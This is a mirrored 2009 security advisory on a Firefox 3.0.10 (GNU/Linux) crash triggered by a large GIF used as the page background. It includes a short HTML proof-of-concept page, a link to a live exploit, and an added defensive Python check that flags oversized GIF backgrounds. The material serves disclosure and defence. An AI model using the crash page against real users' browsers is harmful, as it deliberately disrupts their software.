Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services

CVE               : Not specified
Category          : CWE-754
Price             : $5000
Severity          : High
Author            : Unknown
Risk              : High
Exploitation Type : Remote
Date              : 2009-06-22
CVSS              : CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS              : 0.8
EPSSP             : 0.9786

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009060140

Below is a copy:

ECHO_ADV_110$2009

--------------------------------------------------------------------------------
[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services
--------------------------------------------------------------------------------

Author		: Ahmad Muammar W.K (a.k.a) y3dips
Date Found	: June, 4th 2009
Location	: Indonesia, Jakarta
web		: http://e-rdc.org/v1/news.php?readmore=137
Critical Lvl	: Moderated
Impact		: Browser will automatically shutdown
Where		: From Remote
Disclosure Policy: Full Disclosure Policy (RFPolicy) v2.0
                  http://www.wiretrip.net/rfp/policy.html
--------------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Firefox is a popular Internet browser from the Mozilla Corporation.

Application	: Firefox for GNU/Linux
version		: Firefox/3.0.10 (X11; Linux i686; U; en)
                  Lower versions are also affected (tested with version 3.0.8 on
                  Ubuntu 9.0.4)

URL		: http://firefox.com
Bugzilla entry  : https://bugzilla.mozilla.org/show_bug.cgi?id=496265

Description 	:

Firefox 3.0.10 (and previous versions) for GNU/Linux operating systems is unable
to handle rendering of big GIF images when one is used as the body background.
Simply using a GIF file of random size as the background in the HTML body tag
will crash Firefox.

--------------------------------------------------------------------------------

Exploit Code:
~~~~~~~~~~~~~~~~

<!-- Firefox 3.0.10 DOS exploit, discovered by 
     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) 
     http://y3dips.echo.or.id
//-->

<html>

<head>

<title>Firefox Exploit</title>

</head>

<body background="exploit.gif">

</body>

</html>

live exploit :

http://y3dips.echo.or.id/tempe/ff310expl/
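
A defender-side triage check for the pattern above, as an added example that is not part of the original advisory: it pulls the `<body background=...>` URL out of a page and reads the GIF's declared dimensions from its header. The thresholds, the `fetch` callback and the sample inputs are assumptions; the advisory does not state what size triggers the crash.

```python
import re
import struct

# Assumed triage thresholds; the advisory gives no exact trigger size.
MAX_PIXELS = 4096 * 4096
MAX_BYTES = 5 * 1024 * 1024

BODY_BG = re.compile(r'<body\b[^>]*?\bbackground\s*=\s*["\']?([^"\'\s>]+)', re.I)


def body_background(html):
    """Return the URL given in <body background=...>, or None."""
    m = BODY_BG.search(html)
    return m.group(1) if m else None


def gif_dimensions(data):
    """Return (width, height) from the GIF logical screen descriptor, or None."""
    # Check magic bytes, not the file extension: browsers sniff image types.
    if len(data) < 10 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack("<HH", data[6:10])


def triage(html, fetch):
    """fetch(url) -> bytes is a hypothetical callback (proxy cache, sandbox)."""
    url = body_background(html)
    if url is None:
        return {"background": None, "flag": False}
    data = fetch(url)
    dims = gif_dimensions(data)
    if dims is None:
        return {"background": url, "flag": False}
    width, height = dims
    flag = width * height > MAX_PIXELS or len(data) > MAX_BYTES
    return {"background": url, "width": width, "height": height,
            "bytes": len(data), "flag": flag}


# Constructed sample inputs: 13-byte headers only, not the advisory's exploit.gif.
PAGE = '<html><head></head><body background="bg.gif"></body></html>'
SMALL = b"GIF89a" + struct.pack("<HH", 16, 16) + b"\x00\x00\x00"
LARGE = b"GIF89a" + struct.pack("<HH", 20000, 20000) + b"\x00\x00\x00"

if __name__ == "__main__":
    for name, blob in (("small", SMALL), ("large", LARGE)):
        print(name, triage(PAGE, lambda url: blob))
```
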

--------------------------------------------------------------------------------

Timeline:
~~~~~~~~~

- 20 - 05 - 2009 bug found
- 04 - 06 - 2009 vendor contacted and entry added to Bugzilla
- 04 - 06 - 2009 vendor response, and there's a potential patch
- 09 - 06 - 2009 advisory release

--------------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ my family (ana my wife and ali my son)

~ the_day, K-159, negative, hero, az001, rey, and also all echo staff
~ janex vind "waraxe", str0ke, chopstick
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net

--------------------------------------------------------------------------------
Contact:
~~~~~~~~

y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ---------------------------------------


